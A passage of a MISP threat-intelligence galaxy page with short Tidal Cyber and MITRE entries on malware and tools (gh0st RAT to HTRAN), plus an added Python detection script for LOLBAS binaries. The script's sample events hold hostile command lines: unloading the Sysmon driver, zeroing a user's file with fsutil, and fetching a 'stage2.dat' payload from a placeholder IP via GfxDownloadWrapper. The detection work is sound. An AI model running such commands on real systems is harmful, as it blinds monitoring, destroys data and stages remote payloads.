c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\ * c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\ * c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\

Resources: * https://www.sothis.tech/author/jgalvez/

Detection: * Sigma: proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml * IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.[GfxDownloadWrapper.exe - LOLBAS Project]

Internal MISP references

UUID a83cfdbf-023a-4874-a3d8-9674149ceb53 which can be used as unique global reference for GfxDownloadWrapper in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5186
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
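
The detection hints in the fltMC, Fsutil, Fsi/FsiAnyCpu and GfxDownloadWrapper entries above (process-creation auditing via Security 4688 or Sysmon Event ID 1, the file setZeroData arguments, F# interpreter execution on non-developer hosts, and downloads from anywhere other than https://gameplayapi.intel.com) can be turned into one small rule set run over command-line records. The following Python is an added example written for this page, not code from the LOLBAS project or Tidal Cyber; the record layout, the developer_host flag, the rule names, the severities and the sample command lines are assumptions constructed for the example.

```python
"""Detection logic for the LOLBAS entries above (fltMC, Fsutil, Fsi/FsiAnyCpu,
GfxDownloadWrapper) run over constructed process-creation records. Added
example; not code from the LOLBAS project or Tidal Cyber."""
import re
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass(frozen=True)
class ProcEvent:
    # image/cmdline mirror Sysmon Event ID 1 Image/CommandLine (or Security 4688
    # with command-line auditing). developer_host is an assumed inventory flag.
    image: str
    cmdline: str
    developer_host: bool = False


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    detail: str


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def split_args(cmdline: str) -> list[str]:
    """Arguments after the program token; quoted tokens kept whole, quotes dropped."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)[1:]]


def check_fltmc(ev, args):
    low = [a.lower() for a in args]
    if "unload" not in low:
        return None  # "fltmc filters"/"fltmc instances" is routine administration
    i = low.index("unload") + 1
    target = low[i] if i < len(low) else "?"
    # SysmonDrv is the default Sysmon driver name; a renamed driver still yields
    # the medium finding, since any unload removes a minifilter from the stack.
    return Finding("fltmc_unload_minifilter",
                   "high" if "sysmon" in target else "medium", f"unloaded {target}")


def check_fsutil(ev, args):
    low = [a.lower() for a in args]
    if low[:2] == ["file", "setzerodata"]:  # case-insensitive, as the IOC says
        return Finding("fsutil_setzerodata", "high", "zeroing " + " ".join(args[2:]))
    if low[:2] == ["trace", "decode"]:
        return Finding("fsutil_trace_decode", "medium", "trace decode executed")
    return None


def check_fsi(ev, args):
    if ev.developer_host:
        return None  # expected where Visual Studio / the .NET SDK is in use
    return Finding("fsharp_interpreter_non_dev_host", "medium",
                   "fsi run: " + (" ".join(args) or "(no arguments)"))


EXPECTED_GFX_HOST = "gameplayapi.intel.com"  # documented normal download origin


def check_gfx(ev, args):
    # First argument is the URL, second the destination path.
    if not args:
        return None
    url = urlparse(args[0])
    if url.scheme in ("http", "https") and url.hostname == EXPECTED_GFX_HOST:
        return None
    return Finding("gfxdownloadwrapper_unexpected_url", "high",
                   f"download of {args[0]} to {args[1] if len(args) > 1 else '?'}")


RULES = {"fltmc.exe": check_fltmc, "fsutil.exe": check_fsutil, "fsi.exe": check_fsi,
         "fsianycpu.exe": check_fsi, "gfxdownloadwrapper.exe": check_gfx}


def detect(events) -> list[Finding]:
    """Apply the per-binary rule to each event; return findings in event order."""
    findings = []
    for ev in events:
        rule = RULES.get(image_name(ev.image))
        f = rule(ev, split_args(ev.cmdline)) if rule else None
        if f is not None:
            findings.append(f)
    return findings


# Constructed sample records; the paths, SDK version, JSON path and
# 198.51.100.7 (a documentation address) are illustrative, not observed indicators.
SDK_FSI = r"C:\Program Files\dotnet\sdk\8.0.100\FSharp\fsi.exe"
GFX = (r"C:\Windows\System32\DriverStore\FileRepository"
       r"\igdlh64.inf_amd64_c8634ed19e331cda\GfxDownloadWrapper.exe")
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\fltMC.exe", "fltMC.exe unload SysmonDrv"),
    ProcEvent(r"C:\Windows\System32\fltMC.exe", "fltmc.exe filters"),
    ProcEvent(r"C:\Windows\System32\fsutil.exe", r'fsutil.exe file setZeroData '
              r'offset=0 length=1048576 "C:\Users\a.user\Documents\Q3 ledger.xlsx"'),
    ProcEvent(r"C:\Windows\System32\fsutil.exe", "fsutil fsinfo drives"),
    ProcEvent(SDK_FSI, f'"{SDK_FSI}" C:\\Users\\Public\\stage.fsx'),
    ProcEvent(SDK_FSI, f'"{SDK_FSI}" build.fsx', developer_host=True),
    ProcEvent(GFX, f'GfxDownloadWrapper.exe "https://{EXPECTED_GFX_HOST}/api/v1/games" '
                   r'C:\ProgramData\Intel\games.json'),
    ProcEvent(GFX, r"GfxDownloadWrapper.exe http://198.51.100.7/stage2.dat C:\Users\Public\stage2.dat"),
]
```

detect(SAMPLE_EVENTS) returns four findings: the Sysmon driver unload and the setZeroData call as high, the F# interpreter on the non-developer host as medium, and the GfxDownloadWrapper download from 198.51.100.7 as high; the filter listing, the fsinfo query, the developer-host fsi run and the Intel-origin download produce nothing. The unload rule deliberately does not key on the driver name alone, so a renamed Sysmon driver is still surfaced at medium severity. All of these rules depend on command-line fields being present, which for Security 4688 means command-line auditing must be enabled.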

gh0st RAT

gh0st RAT is a remote access tool (RAT). The source code is public and it has been used by multiple groups.[FireEye Hacking Team][Arbor Musical Chairs Feb 2018][Nccgroup Gh0st April 2018]

Internal MISP references

UUID 269ef8f5-35c8-44ba-afe4-63f4c6431427 which can be used as unique global reference for gh0st RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS', 'Windows']
software_attack_id S0032
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

GLOOXMAIL

GLOOXMAIL is malware used by APT1 that mimics legitimate Jabber/XMPP traffic. [Mandiant APT1]

Internal MISP references

UUID 09fdec78-5253-433d-8680-294ba6847be9 which can be used as unique global reference for GLOOXMAIL in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0026
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

GMER

GMER is a tool used to remove rootkits.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID 83713f85-8b2f-4733-9fea-e6a1494d0bbb which can be used as unique global reference for GMER in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5033
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Gold Dragon

Gold Dragon is a Korean-language, data gathering implant that was first observed in the wild in South Korea in July 2017. Gold Dragon was used along with Brave Prince and RunningRAT in operations targeting organizations associated with the 2018 Pyeongchang Winter Olympics. [McAfee Gold Dragon]

Internal MISP references

UUID 348fdeb5-6a74-4803-ac6e-e0133ecd7263 which can be used as unique global reference for Gold Dragon in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0249
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

GoldenSpy

GoldenSpy is a backdoor malware which has been packaged with legitimate tax preparation software. GoldenSpy was discovered targeting organizations in China, delivered with the "Intelligent Tax" software suite, which is produced by the Golden Tax Department of Aisino Credit Information Co. and is required to pay local taxes.[Trustwave GoldenSpy June 2020]

Internal MISP references

UUID 1b135393-c799-4698-a880-c6a86782adee which can be used as a unique global reference for GoldenSpy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0493
source MITRE
tags ['f2ae2283-f94d-4f8f-bbde-43f2bed66c55']
type ['malware']

GoldFinder

GoldFinder is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. GoldFinder was discovered in early 2021 during an investigation into the SolarWinds Compromise by APT29.[MSTIC NOBELIUM Mar 2021]

Internal MISP references

UUID 4e8c58c5-443e-4f73-91e9-89146f04e307 which can be used as a unique global reference for GoldFinder in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0597
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

GoldMax

GoldMax is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. GoldMax was discovered in early 2021 during the investigation into the SolarWinds Compromise, and has likely been used by APT29 since at least mid-2019. GoldMax uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.[MSTIC NOBELIUM Mar 2021][FireEye SUNSHUTTLE Mar 2021][CrowdStrike StellarParticle January 2022]

Internal MISP references

UUID b05a9763-4288-4656-bf4e-ba02bb8b35d6 which can be used as a unique global reference for GoldMax in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'Windows']
software_attack_id S0588
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Goopy

Goopy is a Windows backdoor and Trojan used by APT32 that shares several similarities with another backdoor used by the group (Denis). Goopy is named for its impersonation of the legitimate Google Updater executable.[Cybereason Cobalt Kitty 2017]

Internal MISP references

UUID a75855fd-2b6b-43d8-99a5-2be03b544f34 which can be used as a unique global reference for Goopy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0477
source MITRE
tags ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59']
type ['malware']
Related clusters

To see the related clusters, click here.

Gpscript

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used by group policy to process scripts

Author: Oddvar Moe

Paths:
* C:\Windows\System32\gpscript.exe
* C:\Windows\SysWOW64\gpscript.exe

Resources:
* https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/

Detection:
* Sigma: proc_creation_win_lolbin_gpscript.yml
* IOC: Scripts added in local group policy
* IOC: Execution of Gpscript.exe after logon
[Gpscript.exe - LOLBAS Project]

Internal MISP references

UUID acf4a502-2730-4b36-aea3-652420390977 which can be used as a unique global reference for Gpscript in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5113
source Tidal Cyber
tags ['2ca5c5e4-ee7f-4698-84ec-ce04d2c1e9cc', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Grandoreiro

Grandoreiro is a banking trojan written in Delphi that was first observed in 2016 and uses a Malware-as-a-Service (MaaS) business model. Grandoreiro has confirmed victims in Brazil, Mexico, Portugal, and Spain.[Securelist Brazilian Banking Malware July 2020][ESET Grandoreiro April 2020]

Internal MISP references

UUID 61d277f2-abdc-4f2b-b50a-10d0fe91e588 which can be used as a unique global reference for Grandoreiro in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0531
source MITRE
tags ['16b47583-1c54-431f-9f09-759df7b5ddb7']
type ['malware']

GraphicalProton

According to joint Cybersecurity Advisory AA23-347A (December 2023), GraphicalProton "is a simplistic backdoor that uses OneDrive, Dropbox, and randomly generated BMPs" to exchange data with its operators. During a 2023 campaign, authorities also observed an HTTPS variant of GraphicalProton that relies on HTTP requests instead of cloud-based services.[U.S. CISA SVR TeamCity Exploits December 2023]

Internal MISP references

UUID f77398ad-e043-4694-ade0-d6ea16a994e7 which can be used as a unique global reference for GraphicalProton in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5077
source Tidal Cyber
type ['malware']
Related clusters

To see the related clusters, click here.

GravityRAT

GravityRAT is a remote access tool (RAT) and has been in ongoing development since 2016. The actor behind the tool remains unknown, but two usernames have been recovered that link to the author, which are "TheMartian" and "The Invincible." According to the National Computer Emergency Response Team (CERT) of India, the malware has been identified in attacks against organizations and entities in India. [Talos GravityRAT]

Internal MISP references

UUID 08cb425d-7b7a-41dc-a897-9057ce57fea9 which can be used as a unique global reference for GravityRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0237
source MITRE
type ['malware']

Green Lambert

Green Lambert is a modular backdoor that security researchers assess has been used by an advanced threat group referred to as Longhorn and The Lamberts. First reported in 2017, the Windows variant of Green Lambert may have been used as early as 2008; a macOS version was uploaded to a multiscanner service in September 2014.[Kaspersky Lamberts Toolkit April 2017][Objective See Green Lambert for OSX Oct 2021]

Internal MISP references

UUID f5691425-6690-4e5e-8304-3ede9d2f5a90 which can be used as a unique global reference for Green Lambert in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows', 'iOS']
software_attack_id S0690
source MITRE
type ['malware']

GreyEnergy

GreyEnergy is a backdoor written in C and compiled in Visual Studio. GreyEnergy shares similarities with the BlackEnergy malware and is thought to be its successor.[ESET GreyEnergy Oct 2018]

Internal MISP references

UUID f646e7f9-4d09-46f6-9831-54668fa20483 which can be used as a unique global reference for GreyEnergy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0342
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

GRIFFON

GRIFFON is a JavaScript backdoor used by FIN7. [SecureList Griffon May 2019]

Internal MISP references

UUID ad358082-d83a-4c22-81a1-6c34dd67af26 which can be used as a unique global reference for GRIFFON in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0417
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

GrimAgent

GrimAgent is a backdoor that has been used before the deployment of Ryuk ransomware since at least 2020; it is likely used by FIN6 and Wizard Spider.[Group IB GrimAgent July 2021]

Internal MISP references

UUID c40a71d4-8592-4f82-8af5-18f763e52caf which can be used as a unique global reference for GrimAgent in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0632
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Grixba

Grixba is a tool used by Play Ransomware operators to scan victim networks for information discovery purposes. Grixba compiles and saves collected information into CSV files, which are then compressed with WinRAR and exfiltrated to threat actors.[Symantec Play Ransomware April 19 2023]

Internal MISP references

UUID 3ff9e020-8a7a-4c6f-a607-117ce9e436c5 which can be used as a unique global reference for Grixba in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5079
source Tidal Cyber
type ['malware']
Related clusters

To see the related clusters, click here.

gsecdump

gsecdump is a publicly available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. [TrueSec Gsecdump]

Internal MISP references

UUID 5ffe662f-9da1-4b6f-ad3a-f296383e828c which can be used as a unique global reference for gsecdump in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0008
source MITRE
tags ['4d767e87-4cf6-438a-927a-43d2d0beaab7']
type ['tool']
Related clusters

To see the related clusters, click here.

GuLoader

GuLoader is a file downloader that has been used since at least December 2019 to distribute a variety of remote administration tool (RAT) malware, including NETWIRE, Agent Tesla, NanoCore, FormBook, and Parallax RAT.[Unit 42 NETWIRE April 2020][Medium Eli Salem GuLoader April 2021]

Internal MISP references

UUID 03e985d6-870b-4533-af13-08b1e0511444 which can be used as a unique global reference for GuLoader in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0561
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']

H1N1

H1N1 is a malware variant that has been distributed via a campaign using VBA macros to infect victims. Although it initially had only loader capabilities, it has evolved to include information-stealing functionality. [Cisco H1N1 Part 1]

Internal MISP references

UUID 5f1602fe-a4ce-4932-9cf9-ec842f2c58f1 which can be used as a unique global reference for H1N1 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0132
source MITRE
type ['malware']

Hacking Team UEFI Rootkit

Hacking Team UEFI Rootkit is a rootkit developed by the company Hacking Team as a method of persistence for remote access software. [TrendMicro Hacking Team UEFI]

Internal MISP references

UUID 75db2ac3-901e-4b1f-9a0d-bac6562d57a3 which can be used as a unique global reference for Hacking Team UEFI Rootkit in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0047
source MITRE
type ['malware']

HALFBAKED

HALFBAKED is a malware family consisting of multiple components intended to establish persistence in victim networks. [FireEye FIN7 April 2017]

Internal MISP references

UUID 5edf0ef7-a960-4500-8a89-8c8b4fdf8824 which can be used as a unique global reference for HALFBAKED in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0151
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

HAMMERTOSS

HAMMERTOSS is a backdoor that was used by APT29 in 2015. [FireEye APT29] [F-Secure The Dukes]

Internal MISP references

UUID cc07f03f-9919-4856-9b30-f4d88940b0ec which can be used as a unique global reference for HAMMERTOSS in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0037
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Hancitor

Hancitor is a downloader that has been used by Pony and other information stealing malware.[Threatpost Hancitor][FireEye Hancitor]

Internal MISP references

UUID 4eee3272-07fa-48ee-a7b9-9dfee3e4550a which can be used as a unique global reference for Hancitor in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0499
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']

HAPPYWORK

HAPPYWORK is a downloader used by APT37 to target South Korean government and financial victims in November 2016. [FireEye APT37 Feb 2018]

Internal MISP references

UUID c2c31b2e-5da6-4feb-80e3-14ea6d0ea7e8 which can be used as a unique global reference for HAPPYWORK in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0214
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

HARDRAIN

HARDRAIN is a Trojan malware variant reportedly used by the North Korean government. [US-CERT HARDRAIN March 2018]

Internal MISP references

UUID ad0ae3b7-88aa-48b3-86ca-6a5d8b5309a7 which can be used as a unique global reference for HARDRAIN in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0246
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Havij

Havij is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. [Check Point Havij Analysis]

Internal MISP references

UUID 8bd36306-bd4b-4a76-8842-44acb0cedbcc which can be used as a unique global reference for Havij in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0224
source MITRE
type ['tool']
Related clusters

To see the related clusters, click here.

HAWKBALL

HAWKBALL is a backdoor that was observed in targeting of the government sector in Central Asia.[FireEye HAWKBALL Jun 2019]

Internal MISP references

UUID 392c5a32-53b5-4ce8-a946-226cb533cc4e which can be used as a unique global reference for HAWKBALL in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0391
source MITRE
type ['malware']

hcdLoader

hcdLoader is a remote access tool (RAT) that has been used by APT18. [Dell Lateral Movement]

Internal MISP references

UUID a7ffe1bd-45ca-4ca4-94da-3b6c583a868d which can be used as a unique global reference for hcdLoader in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0071
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

HDoor

HDoor is malware that has been customized and used by the Naikon group. [Baumgartner Naikon 2015]

Internal MISP references

UUID f155b6f9-258d-4446-8867-fe5ee26d8c72 which can be used as a unique global reference for HDoor in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0061
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

HELLOKITTY

HELLOKITTY is a ransomware written in C++ that shares similar code structure and functionality with DEATHRANSOM and FIVEHANDS. HELLOKITTY has been used since at least 2020; its targets have included a Polish video game developer and a Brazilian electric power company.[FireEye FiveHands April 2021]

Internal MISP references

UUID 813a4ca1-84fe-42dc-89de-5873d028f98d which can be used as a unique global reference for HELLOKITTY in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0617
source MITRE
tags ['4ac8dcde-2665-4066-9ad9-b5572d5f0d28', '3535caad-a155-4996-b986-70bc3cd5ce1e', 'f1ad9eba-f4fd-4aec-92c0-833ac14d741b', '5e7433ad-a894-4489-93bc-41e90da90019', '15787198-6c8b-4f79-bf50-258d55072fee', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

Helminth

Helminth is a backdoor that has at least two variants: one written in VBScript and PowerShell that is delivered via macros in Excel spreadsheets, and one that is a standalone Windows executable. [Palo Alto OilRig May 2016]

Internal MISP references

UUID d6560c81-1e7e-4d01-9814-4be4fb43e655 which can be used as a unique global reference for Helminth in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0170
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

HermeticWiper

HermeticWiper is a data wiper that has been used since at least early 2022, primarily against Ukraine with additional activity observed in Latvia and Lithuania. Some sectors targeted include government, financial, defense, aviation, and IT services.[SentinelOne Hermetic Wiper February 2022][Symantec Ukraine Wipers February 2022][Crowdstrike DriveSlayer February 2022][ESET Hermetic Wiper February 2022][Qualys Hermetic Wiper March 2022]

Internal MISP references

UUID f0456f14-4913-4861-b4ad-5e7f3960040e which can be used as a unique global reference for HermeticWiper in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0697
source MITRE
tags ['2e621fc5-dea4-4cb9-987e-305845986cd3']
type ['malware']

HermeticWizard

HermeticWizard is a worm that has been used to spread HermeticWiper in attacks against organizations in Ukraine since at least 2022.[ESET Hermetic Wizard March 2022]

Internal MISP references

UUID 36ddc8cd-8f80-489e-a702-c682936b5393 which can be used as a unique global reference for HermeticWizard in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0698
source MITRE
tags ['e809d252-12cc-494d-94f5-954c49eb87ce']
type ['malware']

Heyoka Backdoor

Heyoka Backdoor is a custom backdoor, based on the Heyoka open-source exfiltration tool, that has been used by Aoqin Dragon since at least 2013.[SentinelOne Aoqin Dragon June 2022][Sourceforge Heyoka 2022]

Internal MISP references

UUID 1841a6e8-6c23-46a1-9c81-783746083764 which can be used as a unique global reference for Heyoka Backdoor in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1027
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Hh

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Binary used for processing chm files in Windows

Author: Oddvar Moe

Paths:
* C:\Windows\hh.exe
* C:\Windows\SysWOW64\hh.exe

Resources:
* https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/

Detection:
* Sigma: proc_creation_win_hh_chm_execution.yml
* Sigma: proc_creation_win_hh_html_help_susp_child_process.yml
* Elastic: execution_via_compiled_html_file.toml
* Elastic: execution_html_help_executable_program_connecting_to_the_internet.toml
* Splunk: detect_html_help_spawn_child_process.yml
* Splunk: detect_html_help_url_in_command_line.yml
[Hh.exe - LOLBAS Project]

Internal MISP references

UUID 5a0d0b83-5a10-425c-98f7-6cb8eb76fda4 which can be used as a unique global reference for Hh in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5114
source Tidal Cyber
tags ['7d028d1e-7a95-47f0-9367-55517f9ef170', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

HiddenWasp

HiddenWasp is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.[Intezer HiddenWasp Map 2019]

Internal MISP references

UUID ec02fb9c-bf9f-404d-bc54-819f2b3fb040 which can be used as a unique global reference for HiddenWasp in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux']
software_attack_id S0394
source MITRE
type ['malware']

HIDEDRV

HIDEDRV is a rootkit used by APT28. It has been deployed along with Downdelph to execute and hide that malware. [ESET Sednit Part 3] [Sekoia HideDRV Oct 2016]

Internal MISP references

UUID ce1af464-0b14-4fe9-8591-a6fe58aa96c7 which can be used as a unique global reference for HIDEDRV in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0135
source MITRE
tags ['1efd43ee-5752-49f2-99fe-e3441f126b00']
type ['malware']
Related clusters

To see the related clusters, click here.

Hikit

Hikit is malware that has been used by Axiom for late-stage persistence and exfiltration after the initial compromise.[Novetta-Axiom][FireEye Hikit Rootkit]

Internal MISP references

UUID 8046c80c-4339-4cfb-8bfd-464801db2bfe which can be used as a unique global reference for Hikit in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0009
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Hildegard

Hildegard is malware that targets misconfigured kubelets for initial access and runs cryptocurrency miner operations. The malware was first observed in January 2021. The TeamTNT activity group is believed to be behind Hildegard. [Unit 42 Hildegard Malware]

Internal MISP references

UUID 7ef8cd3a-33cf-43bb-a3b8-a78fc844ce0c which can be used as a unique global reference for Hildegard in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'Linux', 'IaaS']
software_attack_id S0601
source MITRE
tags ['4fa6f8e1-b0d5-4169-8038-33e355c08bde', '8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e']
type ['malware']
Related clusters

To see the related clusters, click here.

Hi-Zor

Hi-Zor is a remote access tool (RAT) that has characteristics similar to Sakula. It was used in a campaign named INOCNATION. [Fidelis Hi-Zor]

Internal MISP references

UUID 286184d9-f28a-4d5a-a9dd-2216b3c47809 which can be used as a unique global reference for Hi-Zor in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0087
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']

HOMEFRY

HOMEFRY is a 64-bit Windows password dumper/cracker that has previously been used in conjunction with other Leviathan backdoors. [FireEye Periscope March 2018]

Internal MISP references

UUID 16db13f2-f350-4323-96cb-c5f4ac36c3e0 which can be used as a unique global reference for HOMEFRY in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0232
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

HOPLIGHT

HOPLIGHT is a backdoor Trojan that has reportedly been used by the North Korean government.[US-CERT HOPLIGHT Apr 2019]

Internal MISP references

UUID 4d94594c-2224-46ca-8bc3-28b12ed139f9 which can be used as a unique global reference for HOPLIGHT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0376
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

HotCroissant

HotCroissant is a remote access trojan (RAT) attributed by U.S. government entities to malicious North Korean government cyber activity, tracked collectively as HIDDEN COBRA.[US-CERT HOTCROISSANT February 2020] HotCroissant shares numerous code similarities with Rifdoor.[Carbon Black HotCroissant April 2020]

Internal MISP references

UUID a00e7fcc-b4e8-4f64-83d2-f9db64f0f3fe which can be used as a unique global reference for HotCroissant in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0431
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

HTRAN

HTRAN is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with victim networks. [Operation Quantum Entanglement][NCSC Joint Report Public Tools]

Internal MISP references

UUID b98d9fe7-9aa3-409a-bf5c-eadb01bac948 which can be used as a unique global reference for HTRAN in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'Windows']
software_attack_id S0040
source MITRE
